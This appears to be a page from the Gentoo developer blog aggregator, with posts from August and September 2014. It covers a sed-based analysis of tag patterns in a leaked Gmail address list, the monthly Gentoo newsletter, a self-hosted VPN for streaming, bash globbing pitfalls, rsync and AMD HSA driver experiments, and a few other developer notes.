The first obvious thing you can do is figure out if there are duplicates. While the single extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt

An obvious quick look look of that shows that a good chunk of the extensions (the last line in the generated file) used were referencing xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb" making the list probably quite up to date.

Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …) and then daz (dazstudio), and mythtv. As RT points out it might very well be phishing attempts, but it is also well possible that some of those smaller sites such as comicbookdb were breached and people just used the same passwords for their GMail address as the services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

fgrep . extensions.txt | sort -u

This will give you which extensions include a dot in the name, many of which are actually proper site domains: xtube figures again, and so does comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think what happens is that this list was compiled with breaches of different small websites that wouldn't make a headline (and that most likely did not report to their users!), plus some general phishing. Lots of the passwords that have been confirmed as valid most likely come from people not using different passwords across websites. This breach is fixed like every other before it: stop using the same password across different websites, start using something like LastPass, and use 2 Factor Authentication everywhere is possible.

September 08, 2014
Gentoo Monthly Newsletter: August 2014 (September 08, 2014, 21:20 UTC)

Gentoo News

Council News

Concerning the handling of bash-completion and of phase functions in eclasses in general the council decided no actions. The former should be handled by the shell-tools team, the latter needs more discussion on the mailing lists.

Then we had two hot topics. The first was the games team policy; the council clarified that the games team has in no way authority over game ebuilds maintained by other developers. In addition, the games team should elect a lead in the near future. If it doesn’t it will be considered dysfunctional.  Tim Harder (radhermit) acts as interim lead and organizes the elections.

Next, rumors about the handling of dynamic dependencies in Portage had sparked quite a stir. The council asks the Portage team basically not to remove dynamic dependency handling before they haven’t worked out and presented a good plan how Gentoo would work without them. Portage tree policies and the
handling of eclasses and virtuals in particular need to be clarified.

Finally the list of planned features for EAPI 6 was amended by two items, namely additional options for configure and a non-runtime switchable ||= () or-dependency.

Gentoo Developer Moves

Summary

Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.

Changes

  • Ian Stakenvicius (axs) joined the multilib project
  • Michał Górny (mgorny) joined the QA team
  • Kristian Fiskerstrand (k_f) joined the Security team
  • Richard Freeman (rich0) joined the systemd team
  • Pavlos Ratis (dastergon) joined the Gentoo Infrastructure team
  • Patrice Clement (monsieur) and Ian Stakenvicius (axs) joined the perl team
  • Chris Reffett (creffett) joined the Wiki team
  • Pavlos Ratis (dastergon) left the KDE project
  • Dirkjan Ochtman (djc) left the ComRel project

Portage

This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17653
Ebuilds 37397
Architecture Stable Testing Total % of Packages
alpha 3661 574 4235 23.99%
amd64 10895 6263 17158 97.20%
amd64-fbsd 0 1573 1573 8.91%
arm 2692 1755 4447 25.19%
arm64 570 32 602 3.41%
hppa 3073 496 3569 20.22%
ia64 3196 626 3822 21.65%
m68k 614 98 712 4.03%
mips 0 2410 2410 13.65%
ppc 6841 2475 9316 52.77%
ppc64 4332 971 5303 30.04%
s390 1464 349 1813 10.27%
sh 1650 427 2077 11.77%
sparc 4135 922 5057 28.65%
sparc-fbsd 0 317 317 1.80%
x86 11572 5297 16869 95.56%
x86-fbsd 0 3241 3241 18.36%

gmn-portage-stats-2014-09

Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201408-19 app-office/openoffice-bin (and 3 more) OpenOffice, LibreOffice: Multiple vulnerabilities 283370
201408-18 net-analyzer/nrpe NRPE: Multiple Vulnerabilities 397603
201408-17 app-emulation/qemu QEMU: Multiple vulnerabilities 486352
201408-16 www-client/chromium Chromium: Multiple vulnerabilities 504328
201408-15 dev-db/postgresql-server PostgreSQL: Multiple vulnerabilities 456080
201408-14 net-misc/stunnel stunnel: Information disclosure 503506
201408-13 dev-python/jinja Jinja2: Multiple vulnerabilities 497690
201408-12 www-servers/apache Apache HTTP Server: Multiple vulnerabilities 504990
201408-11 dev-lang/php PHP: Multiple vulnerabilities 459904
201408-10 dev-libs/libgcrypt Libgcrypt: Side-channel attack 519396
201408-09 dev-libs/libtasn1 GNU Libtasn1: Multiple vulnerabilities 511536
201408-08 sys-apps/file file: Denial of Service 505534
201408-07 media-libs/libmodplug ModPlug XMMS Plugin: Multiple vulnerabilities 480388
201408-06 media-libs/libpng libpng: Multiple vulnerabilities 503014
201408-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 519790
201408-04 dev-util/catfish Catfish: Multiple Vulnerabilities 502536
201408-03 net-libs/libssh LibSSH: Information disclosure 503504
201408-02 media-libs/freetype FreeType: Arbitrary code execution 504088
201408-01 dev-php/ZendFramework Zend Framework: SQL injection 369139

Package Removals/Additions

Removals

Package Developer Date
virtual/perl-Class-ISA dilfridge 02 Aug 2014
virtual/perl-Filter dilfridge 02 Aug 2014
dev-vcs/gitosis robbat2 04 Aug 2014
dev-vcs/gitosis-gentoo robbat2 04 Aug 2014
virtual/python-argparse mgorny 11 Aug 2014
virtual/python-unittest2 mgorny 11 Aug 2014
app-emacs/sawfish ulm 19 Aug 2014
virtual/ruby-test-unit graaff 20 Aug 2014
games-action/d2x mr_bones_ 25 Aug 2014
games-arcade/koules mr_bones_ 25 Aug 2014
dev-lang/libcilkrts ottxor 26 Aug 2014

Additions

Package Developer Date
dev-python/oslotest prometheanfire 01 Aug 2014
dev-db/tokumx chainsaw 01 Aug 2014
sys-boot/gummiboot mgorny 02 Aug 2014
app-admin/supernova alunduil 03 Aug 2014
dev-db/mysql-cluster robbat2 03 Aug 2014
net-libs/txtorcon mrueg 04 Aug 2014
dev-ruby/prawn-table mrueg 06 Aug 2014
sys-apps/cv zx2c4 06 Aug 2014
media-libs/openctm amynka 07 Aug 2014
sci-libs/levmar amynka 07 Aug 2014
media-gfx/printrun amynka 07 Aug 2014
dev-python/alabaster idella4 10 Aug 2014
dev-haskell/regex-pcre slyfox 11 Aug 2014
dev-python/gcs-oauth2-boto-plugin vapier 12 Aug 2014
dev-python/astropy-helpers jlec 12 Aug 2014
dev-perl/Math-ModInt chainsaw 13 Aug 2014
dev-ruby/classifier-reborn mrueg 13 Aug 2014
media-gfx/meshlab amynka 14 Aug 2014
dev-libs/librevenge scarabeus 15 Aug 2014
www-apps/jekyll-coffeescript mrueg 15 Aug 2014
www-apps/jekyll-gist mrueg 15 Aug 2014
www-apps/jekyll-paginate mrueg 15 Aug 2014
www-apps/jekyll-watch mrueg 15 Aug 2014
sec-policy/selinux-salt swift 15 Aug 2014
www-apps/jekyll-sass-converter mrueg 15 Aug 2014
dev-ruby/rouge mrueg 15 Aug 2014
dev-ruby/ruby-beautify graaff 16 Aug 2014
sys-firmware/nvidia-firmware idl0r 17 Aug 2014
media-libs/libmpris2client ssuominen 20 Aug 2014
xfce-extra/xfdashboard ssuominen 20 Aug 2014
www-client/opera-developer jer 20 Aug 2014
dev-libs/openspecfun patrick 21 Aug 2014
dev-libs/marisa dlan 22 Aug 2014
media-sound/dcaenc beandog 22 Aug 2014
sci-mathematics/geogebra amynka 23 Aug 2014
dev-python/crumbs alunduil 25 Aug 2014
media-gfx/kxstitch kensington 26 Aug 2014
media-gfx/symboleditor kensington 26 Aug 2014
dev-perl/Sort-Key chainsaw 26 Aug 2014
dev-perl/Sort-Key-IPv4 chainsaw 26 Aug 2014
sci-visualization/yt xarthisius 26 Aug 2014
dev-ruby/globalid graaff 27 Aug 2014
dev-python/certifi idella4 27 Aug 2014
www-apps/jekyll-sitemap mrueg 27 Aug 2014
sys-apps/tuned dlan 29 Aug 2014
app-portage/g-sorcery jauhien 29 Aug 2014
app-portage/gs-elpa jauhien 29 Aug 2014
app-portage/gs-pypi jauhien 29 Aug 2014
app-admin/eselect-rust jauhien 29 Aug 2014
sys-block/raid-check chutzpah 29 Aug 2014
dev-python/python3-openid maksbotan 30 Aug 2014
dev-python/python-social-auth maksbotan 30 Aug 2014
dev-python/websocket-client alunduil 31 Aug 2014
dev-ruby/ethon graaff 31 Aug 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 August 2014 and 31 August 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
gmn-activity-2014-08

Bug Activity Number
New 1575
Closed 981
Not fixed 187
Duplicates 145
Total 6023
Blocker 5
Critical 19
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 102
2 Gentoo's Team for Core System packages 39
3 Gentoo KDE team 37
4 Default Assignee for Orphaned Packages 32
5 Julian Ospald (hasufell) 26
6 Gentoo Games 25
7 Portage team 25
8 Netmon Herd 24
9 Python Gentoo Team 23
10 Others 647

gmn-closed-2014-08

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 160
2 Gentoo Security 61
3 Default Assignee for Orphaned Packages 60
4 Gentoo KDE team 45
5 Gentoo's Team for Core System packages 45
6 Gentoo Linux Gnome Desktop Team 37
7 Gentoo Games 28
8 Portage team 28
9 Python Gentoo Team 26
10 Others 1084

gmn-opened-2014-08

Heard in the community

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

September 07, 2014
Jeremy Olexa a.k.a. darkside (homepage, bugs)
Bypassing Geolocation … (September 07, 2014, 00:42 UTC)

By now we all know that it is pretty easy to bypass geolocation blockage with a web proxy or vpn service. After all, there is over 2 million google results on “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible but not use a service that I had to pay for a month since I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling, ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work then that strikes out many other ideas, I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use TOR and set the exit node to the UK. That seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London and then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A Linode StackScript is a feature that Linode offers, it is a user defined script ran at first boot of your host. Surprisingly, no one published one to install OpenVPN yet. So, I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a vpn automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import it into your client.

End result: It took 42 minutes for me to download a one hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider that has a presence in the UK, like Digital Ocean who charges $.007/hour.

Addendum: Even though I abandoned my first attempt, I left the browser window open and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for, I encourage you to do that same. For reference it costs a UK household, $.02 USD tax per hour for BBC. (source)

September 05, 2014


Figure 1.1: Iron Penguin

Fig. 1: Iron Penguin

Gentoo Linux is proud to announce the availability of a new LiveDVD to celebrate the continued collaboration between Gentoo users and developers, The LiveDVD features a superb list of packages, some of which are listed below.

A special thanks to the Gentoo Infrastructure Team and likewhoa. Their hard work behind the scenes provide the resources, services and technology necessary to support the Gentoo Linux project.

  • Packages included in this release: Linux Kernel 3.15.6, Xorg 1.16.0, KDE 4.13.3, Gnome 3.12.2, XFCE 4.10, Fluxbox 1.3.5, LXQT Desktop 0.7.0, i3 Desktop 2.8, Firefox 31.0, LibreOffice 4.2.5.2, Gimp 2.8.10-r1, Blender 2.71-r1, Amarok 2.8.0-r2, Chromium 37.0.2062.35 and much more ...
  • If you want to see if your package is included we have generated both the x86 package list, and amd64 package list. The FAQ is located at FAQ. DVD cases and covers for the 20140826 release are located at Artwork. Persistence mode is back in the 20140826 release!.

The LiveDVD is available in two flavors: a hybrid x86/x86_64 version, and an x86_64 multi lib version. The livedvd-x86-amd64-32ul-20140826 version will work on 32-bit x86 or 64-bit x86_64. If your CPU architecture is x86, then boot with the default gentoo kernel. If your arch is amd64, boot with the gentoo64 kernel. This means you can boot a 64-bit kernel and install a customized 64-bit user land while using the provided 32-bit user land. The livedvd-amd64-multilib-20140826 version is for x86_64 only.

If you are ready to check it out, let our bouncer direct you to the closest x86 image or amd64 image file.

If you need support or have any questions, please visit the discussion thread on our forum.

Thank you for your continued support,
Gentoo Linux Developers, the Gentoo Foundation, and the Gentoo-Ten Project.

Michał Górny a.k.a. mgorny (homepage, bugs)
Bash pitfalls: globbing everywhere! (September 05, 2014, 08:31 UTC)

Bash has many subtle pitfalls, some of them being able to live unnoticed for a very long time. A common example of that kind of pitfall is ubiquitous filename expansion, or globbing. What many script writers forget about to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add up to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns — square brackets ([) do that as well. Secondly, by default bash (and POSIX shell) take failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing.

It's all just a matter of running in the proper directory for the result to change. Of course, it's often unlikely — maybe even close to impossible. You can work towards preventing that by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides a two major facilities that could help you stop mistakes — shopts nullglob and failglob.

The nullglob option is a good choice for a default for your script. After enabling it, failing filename expansions result in no parameters rather than verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"
done

Without nullglob, the above may actually return a/* if no file matches the pattern. For this reason, you would need to add an additional check for existence of file inside the loop. With nullglob, it will just ‘omit’ the unmatched arguments. In fact, if none of the patterns match the loop won't be run even once.

Secondly, it turns every accidental glob into null. While this isn't the most friendly warning and in fact it may have very undesired results, you're more likely to notice that something is going wrong.

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of any mistake before someone hits it the hard way. Of course, assuming that it doesn't accidentally expand into something already.

There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I myself noticed lately is the attempt of using unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"
done

At a first glance, everything looks fine. ${v} contains a whitespace-separated list of words and we iterate over each word. The pitfall here is that words in ${v} are subject to filename expansion. For example, if a lone asterisk would happen to be there (like v='10 * 4'), you'd actually get all files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.

Personally, I dislike the first two since they require set-and-restore magic, and the latter also has the penalty of doing the globbing then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"
done

While normally read is used to read from files, we can use the here string syntax of bash to feed the variable into it. The -r option disables backslash escape processing that is undesired here. -d '' causes read to process the whole input and not stop at any delimiter (like newline). -a words causes it to put the split words into array ${words[@]} — and since we know how to safely iterate over an array, the underlying issue is solved.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
32bit Madness (September 05, 2014, 06:41 UTC)

This week I ran into a funny issue doing backups with rsync:

rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of space randomly. Plus 3 new bugs for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...

September 03, 2014
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
AMD HSA (September 03, 2014, 06:25 UTC)

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, what AMD calls "HSA" - Heterogenous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:

[    1.651992] [drm] radeon kernel modesetting enabled.
[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)

AMD has provided a small shell script to test if things work:
# ./kfd_check_installation.sh 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways
These ebuilds can be found here

Since there's at least one binary file with undeclared license and some other inconsistencies I cannot recommend installing these packages right now.
And of course I hope that AMD will release the sourcecode of these libraries ...

There's an example "vector_copy" program included, it mostly works, but appears to go into an infinite loop. Outout looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
^C
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform to do some epic numbercrunching :)

August 30, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Showing return code in PS1 (August 30, 2014, 23:14 UTC)

If you do daily management on Unix/Linux systems, then checking the return code of a command is something you’ll do often. If you do SELinux development, you might not even notice that a command has failed without checking its return code, as policies might prevent the application from showing any output.

To make sure I don’t miss out on application failures, I wanted to add the return code of the last executed command to my PS1 (i.e. the prompt displayed on my terminal).
I wasn’t able to add it to the prompt easily – in fact, I had to use a bash feature called the prompt command.

When the PROMPT_COMMMAND variable is defined, then bash will execute its content (which I declare as a function) to generate the prompt. Inside the function, I obtain the return code of the last command ($?) and then add it to the PS1 variable. This results in the following code snippet inside my ~/.bashrc:

export PROMPT_COMMAND=__gen_ps1
 
function __gen_ps1() {
  local EXITCODE="$?";
  # Enable colors for ls, etc.  Prefer ~/.dir_colors #64489
  if type -P dircolors >/dev/null ; then
    if [[ -f ~/.dir_colors ]] ; then
      eval $(dircolors -b ~/.dir_colors)
    elif [[ -f /etc/DIR_COLORS ]] ; then
      eval $(dircolors -b /etc/DIR_COLORS)
    fi
  fi
 
  if [[ ${EUID} == 0 ]] ; then
    PS1="RC=${EXITCODE} \[\033[01;31m\]\h\[\033[01;34m\] \W \$\[\033[00m\] "
  else
    PS1="RC=${EXITCODE} \[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] "
  fi
}

With it, my prompt now nicely shows the return code of the last executed command. Neat.

Edit: Sean Patrick Santos showed me my utter failure in that this can be accomplished with the PS1 variable immediately, without using the overhead of the PROMPT_COMMAND. Just make sure to properly escape the $ sign which I of course forgot in my late-night experiments :-(.

Luca Barbato a.k.a. lu_zero (homepage, bugs)
PowerPC is back (and little endian) (August 30, 2014, 17:32 UTC)

Yesterday I fixed a PowerPC issue since ages, it is an endianess issue, and it is (funny enough) on the little endian flavour of it.

PowerPC

I have some ties with this architecture since my interest on the architecture (and Altivec/VMX in particular) is what made me start contributing to MPlayer while fixing issue on Gentoo and from there hack on the FFmpeg of the time, meet the VLC people, decide to part ways with Michael Niedermayer and with the other main contributors of FFmpeg create Libav. Quite a loong way back in the time.

Big endian, Little Endian

It is a bit surprising that IBM decided to use little endian (since big endian is MUCH nicer for I/O processing such as networking) but they might have their reasons.

PowerPC traditionally always had been both-endian with the ability to switch on the fly between the two (this made having foreign-endian simulators lightly less annoying to manage), but the main endianess had always been big.

This brings us to a quite interesting problem: Some if not most of the PowerPC code had been written thinking in big-endian. Luckily since most of the code wrote was using C intrinsics (Bless to whoever made the Altivec intrinsics not as terrible as the other ones around) it won’t be that hard to recycle most of the code.

More will follow.

August 29, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Hardened august meeting (August 29, 2014, 14:43 UTC)

Another month has passed, so we had another online meeting to discuss the progress within Gentoo Hardened.

Lead elections

The yearly lead elections within Gentoo Hardened were up again. Zorry (Magnus Granberg) was re-elected as project lead so doesn’t need to update his LinkedIn profile yet ;-)

Toolchain

